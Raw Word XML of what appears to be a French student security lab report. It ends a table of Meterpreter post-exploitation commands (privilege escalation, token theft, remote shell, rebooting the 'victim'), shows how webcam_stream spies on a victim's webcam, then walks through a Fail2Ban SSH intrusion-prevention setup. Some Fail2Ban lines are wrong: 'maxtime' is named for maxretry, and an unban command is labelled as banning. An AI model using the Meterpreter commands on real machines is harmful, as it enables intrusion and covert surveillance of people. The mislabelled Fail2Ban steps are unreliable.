      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="4768DA84"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536F9C4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execute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7BCB7588"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Executer une commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="4CEC1CA3"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1C93DA63"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getpid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6F2DD90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Obtient l'ID de processus actuel (PID)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="32278599"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1913887C"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getprivs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1D67CCC6"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Obtient autant de privilèges que possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="009E8036"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313D04DE"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getuid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0CF07AAA"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Obtient l’utilisateur que le serveur est exécuté de</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="0600B5E0"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5BA950C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kill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098D1F9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Mettre fin au processus désigné par le PID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="2583E623"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644E0EB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ps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21967E9C"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Liste des processus en cours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="39324EC9"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5020A0C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reboot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0EC51138"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Redémarre l'ordinateur victime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="01A84EAC"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5A054CC2"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reg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185EA338" w14:textId="5AED5A90"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Interagir avec le registre de la victime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="248840CD"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30DEE039"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rev2self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714CA5F9" w14:textId="4A8FCC66"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Appelle RevertToSelf () sur la machine victime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="5BA32683"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1A2AB398"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shell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73388DC1"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Ouvre un shell de commande sur la machine victime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="4652AB51"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DDEBF7" w:fill="DDEBF7"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D09641B"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shutdown </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7720" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="DDEBF7" w:fill="DDEBF7"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C522499" w14:textId="52E9CC5D"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Arrête l'ordinateur de la victime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="15DAC29C" w14:textId="77777777" w:rsidTr="00E67504">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C8322EE"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steal_token </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7720" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DE002DD" w14:textId="77777777" w:rsidR="00E67504" w:rsidRPr="00E67504" w:rsidRDefault="00E67504" w:rsidP="00E67504">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67504">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Tente de voler le jeton d'un processus spécifié (PID)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C2097E2" w14:textId="26BDF04B" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="7CCBC686" w14:textId="26B464B8" w:rsidR="004C3D9F" w:rsidRDefault="00495FF2" w:rsidP="004C3D9F">
      <w:r w:rsidRPr="00495FF2">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exemple de commandes meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A531DF" w14:textId="3FF57C15" w:rsidR="004C3D9F" w:rsidRDefault="009E32C1" w:rsidP="004C3D9F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251716608" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1AE03FED" wp14:editId="7B584CE7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>238760</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760085" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20250"/>
                <wp:lineTo x="21502" y="20250"/>
                <wp:lineTo x="2150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0769"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="576008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FF2">
        <w:t>Une fois la session meterpreter active, on peut entrer la commande suivante :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70267958" w14:textId="5FB82750" w:rsidR="00B04749" w:rsidRDefault="00B04749" w:rsidP="004C3D9F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251717632" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="323CC9FD" wp14:editId="5F5F2DC3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>278517</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3049270" cy="2305050"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="19050"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-135" y="-179"/>
                <wp:lineTo x="-135" y="21600"/>
                <wp:lineTo x="21591" y="21600"/>
                <wp:lineTo x="21591" y="-179"/>
                <wp:lineTo x="-135" y="-179"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="5" name="Image 5" descr="Une image contenant texte, moniteur, équipement électronique,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moniteur, équipement électronique, écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId23" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="41223" t="1957" b="6087"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3049270" cy="23050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L’invité de commande renvoi la liste des webcam actives sur la machine victime. Il nous suffit ensuite d’entre </w:t>
      </w:r>
      <w:r w:rsidRPr="00B04749">
        <w:rPr>
          <w:rStyle w:val="CONSOLECar"/>
        </w:rPr>
        <w:t>webcam_stream</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pour qu’une fenêtre Firefox s’ouvre, affichant le contenu de la webcam de l’ordinateur victime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453AD755" w14:textId="2482AA03" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="76913B66" w14:textId="34AEC240" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="3493F3A9" w14:textId="75A51D7E" w:rsidR="009E32C1" w:rsidRDefault="009E32C1" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="6EB08542" w14:textId="77777777" w:rsidR="00D36D5E" w:rsidRDefault="00D36D5E" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="4965F1FB" w14:textId="0866ECE7" w:rsidR="009E32C1" w:rsidRDefault="00217BEE" w:rsidP="00217BEE">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc101512055"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>IPS Fail2Ban</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="28137606" w14:textId="29F31AA2" w:rsidR="009E32C1" w:rsidRDefault="00217BEE" w:rsidP="004C3D9F">
      <w:r>
        <w:t xml:space="preserve">Afin de permettre une sécurité supplémentaire sur nos machine ainsi que de réduire les risques d’attaque, nous allons mettre en place un système de prévention d’intrusion bloquant les entrées </w:t>
      </w:r>
      <w:r w:rsidR="0053351B">
        <w:t>SSH non autorisées</w:t>
      </w:r>
      <w:r w:rsidR="00E67A18">
        <w:t xml:space="preserve"> sur notre serveur Ubuntu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5194C9" w14:textId="1CC3FC0D" w:rsidR="00E67A18" w:rsidRDefault="00E67A18" w:rsidP="00E67A18">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc101512056"/>
      <w:r>
        <w:t>Prérequis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="25A93ABE" w14:textId="479BF0F2" w:rsidR="00E67A18" w:rsidRPr="00E67A18" w:rsidRDefault="00E67A18" w:rsidP="00E67A18">
      <w:r>
        <w:t>Avoir une machine ubuntu serveur à jour ainsi qu’une autre machine sur laquelle le service ssh est installé pour se connecter au serveur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EFFBF0" w14:textId="44774ECD" w:rsidR="00E67A18" w:rsidRDefault="00E67A18" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="3016F4FA" w14:textId="5871FDB8" w:rsidR="00E67A18" w:rsidRDefault="00E67A18" w:rsidP="00E67A18">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc101512057"/>
      <w:r>
        <w:t>Installation et configuration du service fail2ban</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="041ED3E0" w14:textId="6A6EB432" w:rsidR="0092473B" w:rsidRPr="0044243B" w:rsidRDefault="0092473B" w:rsidP="0044243B">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc101512058"/>
      <w:r w:rsidRPr="0044243B">
        <w:t>Installation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="7A9BE6CF" w14:textId="381B231D" w:rsidR="004C3D9F" w:rsidRDefault="0053351B" w:rsidP="00E67A18">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Pour cela, nous allons installer le service Fail2ban.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09651635" w14:textId="77777777" w:rsidR="00E67A18" w:rsidRDefault="00E67A18" w:rsidP="00E67A18">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF0EDA1" w14:textId="0611B744" w:rsidR="0053351B" w:rsidRDefault="00E67A18" w:rsidP="00E67A18">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt install fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1C0771" w14:textId="6FC24A8D" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="0BB30693" w14:textId="05F18377" w:rsidR="00E67A18" w:rsidRDefault="00E67A18" w:rsidP="00E67A18">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>On vérifie que le service fail2ban est bien en cours d’exécution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7525C7" w14:textId="13815A36" w:rsidR="004C3D9F" w:rsidRDefault="00E67A18" w:rsidP="00E67A18">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r w:rsidRPr="00E67A18">
        <w:t>sudo systemctl status fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BC31AD" w14:textId="12CA7E7D" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="7D633435" w14:textId="7FE43686" w:rsidR="004C3D9F" w:rsidRDefault="00E67A18" w:rsidP="0092473B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour configurer notre service fail2ban et appliquer nos paramètres, il faut ouvrir le fichier </w:t>
      </w:r>
      <w:r w:rsidR="0092473B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>jail.local</w:t>
      </w:r>
      <w:r w:rsidR="0092473B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710CB461" w14:textId="6E99C5BD" w:rsidR="0092473B" w:rsidRPr="0092473B" w:rsidRDefault="0092473B" w:rsidP="0092473B">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r w:rsidRPr="0092473B">
        <w:t>sudo nano /etc/fail2ban/jail.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA7F12B" w14:textId="1789A157" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="15FF4540" w14:textId="189116AD" w:rsidR="0044243B" w:rsidRDefault="0044243B" w:rsidP="0044243B">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc101512059"/>
      <w:r>
        <w:t>Configuration - WhiteList</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="5BBC2EBA" w14:textId="6AB84A2E" w:rsidR="0092473B" w:rsidRDefault="0092473B" w:rsidP="0092473B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Une fois le fichier ouvert, on ajoute la ligne suivante nous permettant de white listé les adresses IP souhaitées (dans le cas présent nous allons ajouté l’adresse ip de notre serveur ubuntu).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C905CEE" w14:textId="494A07D4" w:rsidR="0092473B" w:rsidRDefault="0092473B" w:rsidP="0092473B">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r>
        <w:t>ignoreip = 192.168.8.52/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C66EFE9" w14:textId="440EA2DF" w:rsidR="0092473B" w:rsidRDefault="0092473B" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="008B2E24" w14:textId="34D6CEA4" w:rsidR="0092473B" w:rsidRDefault="0044243B" w:rsidP="0044243B">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc101512060"/>
      <w:r>
        <w:t>Configuration - paramètres d’interdiction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="2FC2327C" w14:textId="3F81F016" w:rsidR="0044243B" w:rsidRPr="0044243B" w:rsidRDefault="0044243B" w:rsidP="001F222B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour modifier la durée pendant laquelle une adresse IP est interdite il nous suffit d’ajouter la ligne suivante (la valeur par défaut est en secondes, la lettre </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> indique des jours, une valeur négative interdit définitivement l’adresse IP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9919BD" w14:textId="279823D6" w:rsidR="0092473B" w:rsidRDefault="0044243B" w:rsidP="0044243B">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r>
        <w:t>bantime = 2d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7B5FE8" w14:textId="511B0ACA" w:rsidR="0092473B" w:rsidRDefault="0092473B" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="1579DA7A" w14:textId="2951C6F0" w:rsidR="0092473B" w:rsidRPr="0044243B" w:rsidRDefault="0044243B" w:rsidP="001F222B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Le paramètre </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>findtime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> définit la durée encadrant les paramètres d’interdiction. Par exemple, si nous définissons un nombre d’échec à la connexion à 5 essais, ces 5 essais doivent avoir été effectué durant cette période </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>findtime</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074CBCC9" w14:textId="6F6090FA" w:rsidR="0092473B" w:rsidRDefault="001F222B" w:rsidP="001F222B">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r>
        <w:t>findtime = 10m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADA4053" w14:textId="21E29A07" w:rsidR="0092473B" w:rsidRDefault="0092473B" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="0D3BCB59" w14:textId="398C462C" w:rsidR="0092473B" w:rsidRPr="001F222B" w:rsidRDefault="001F222B" w:rsidP="001F222B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enfin, le paramètre </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>maxtime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> définit le nombre d’échecs maximum (réalisés durant la période </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>findtime</w:t>
      </w:r>
      <w:r>
        <w:t>) avant que l’adresse IP soit bannie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD3D2D8" w14:textId="4D8F1D81" w:rsidR="0092473B" w:rsidRDefault="001F222B" w:rsidP="001F222B">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r>
        <w:t>maxretry = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2D027F" w14:textId="4FC5C603" w:rsidR="0092473B" w:rsidRDefault="0092473B" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="714A2EF0" w14:textId="2966F4B0" w:rsidR="0092473B" w:rsidRDefault="005965DF" w:rsidP="005965DF">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc101512061"/>
      <w:r>
        <w:t>Prisons Fail2Ban</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="482E5962" w14:textId="66ED4225" w:rsidR="0092473B" w:rsidRDefault="005965DF" w:rsidP="004C3D9F">
      <w:r>
        <w:t xml:space="preserve">Les paramètres vu précédemment peuvent être inclus dans une prison Fail2ban. Ces prisons contiennent des conditions ainsi que des actions et lorsque les conditions sont remplies, les actions sont exécutées. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370F8186" w14:textId="3480A69C" w:rsidR="005965DF" w:rsidRDefault="005965DF" w:rsidP="004C3D9F">
      <w:r>
        <w:t xml:space="preserve">Pour définir notre prison avec les paramètres souhaitées, il nous suffit d’ouvrir le fichier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>jail.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> puis d’entrer nos conditions pour le service SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64617EE5" w14:textId="77777777" w:rsidR="005965DF" w:rsidRPr="0092473B" w:rsidRDefault="005965DF" w:rsidP="005965DF">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r w:rsidRPr="0092473B">
        <w:t>sudo nano /etc/fail2ban/jail.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46847122" w14:textId="16A2864F" w:rsidR="005965DF" w:rsidRDefault="005965DF" w:rsidP="00B5051A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B5051A">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Les conditions</w:t>
      </w:r>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1BB1A2" w14:textId="77777777" w:rsidR="005965DF" w:rsidRDefault="005965DF" w:rsidP="005965DF">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>[sshd]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207A855F" w14:textId="77777777" w:rsidR="005965DF" w:rsidRDefault="005965DF" w:rsidP="005965DF">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>enabled   = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175B482F" w14:textId="77777777" w:rsidR="005965DF" w:rsidRDefault="005965DF" w:rsidP="005965DF">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>maxretry  = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ECEF2B" w14:textId="062DE8DF" w:rsidR="005965DF" w:rsidRDefault="005965DF" w:rsidP="005965DF">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">findtime  = </w:t>
      </w:r>
      <w:r>
        <w:t>10m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A01205" w14:textId="058D685F" w:rsidR="005965DF" w:rsidRDefault="005965DF" w:rsidP="005965DF">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">bantime   = </w:t>
      </w:r>
      <w:r>
        <w:t>2d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7407333A" w14:textId="0CE49FEF" w:rsidR="005965DF" w:rsidRDefault="005965DF" w:rsidP="005965DF">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ignoreip  = </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.8.52/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D85563" w14:textId="3B508E55" w:rsidR="00B5051A" w:rsidRDefault="00B5051A" w:rsidP="00B5051A"/>
    <w:p w14:paraId="1C7124C7" w14:textId="31A578E3" w:rsidR="00B5051A" w:rsidRDefault="00B5051A" w:rsidP="008C0242">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>On redémarre ensuite le service (après chaque modifications des paramètres) afin que</w:t>
      </w:r>
      <w:r w:rsidR="008C0242">
        <w:t xml:space="preserve"> le service prenne en compte nos conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341B781A" w14:textId="6A148179" w:rsidR="008C0242" w:rsidRDefault="008C0242" w:rsidP="008C0242">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r w:rsidRPr="008C0242">
        <w:t>sudo systemctl restart fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D4A8F0" w14:textId="6D61A5B3" w:rsidR="00B5051A" w:rsidRDefault="00B5051A" w:rsidP="00B5051A"/>
    <w:p w14:paraId="1EF1E22A" w14:textId="6F935832" w:rsidR="008C0242" w:rsidRPr="008C0242" w:rsidRDefault="008C0242" w:rsidP="00B5051A">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0242">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Quelques commandes importantes :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3935B6" w14:textId="09519A8A" w:rsidR="00B5051A" w:rsidRDefault="008C0242" w:rsidP="008C0242">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Pour vérifier l’état d’une prison :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA24E4B" w14:textId="73420E3C" w:rsidR="008C0242" w:rsidRDefault="008C0242" w:rsidP="008C0242">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r w:rsidRPr="008C0242">
        <w:t>sudo fail2ban-client status sshd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7BA360" w14:textId="77777777" w:rsidR="008C0242" w:rsidRDefault="008C0242" w:rsidP="008C0242">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDF001E" w14:textId="036673F8" w:rsidR="008C0242" w:rsidRDefault="008C0242" w:rsidP="008C0242">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Pour bannir une adresse IP :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FDF2E5" w14:textId="021588A8" w:rsidR="008C0242" w:rsidRDefault="008C0242" w:rsidP="008C0242">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r w:rsidRPr="008C0242">
        <w:t xml:space="preserve">sudo fail2ban-client set sshd unbanip </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.8.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EFEF42" w14:textId="77777777" w:rsidR="008C0242" w:rsidRDefault="008C0242" w:rsidP="008C0242">
      <w:pPr>
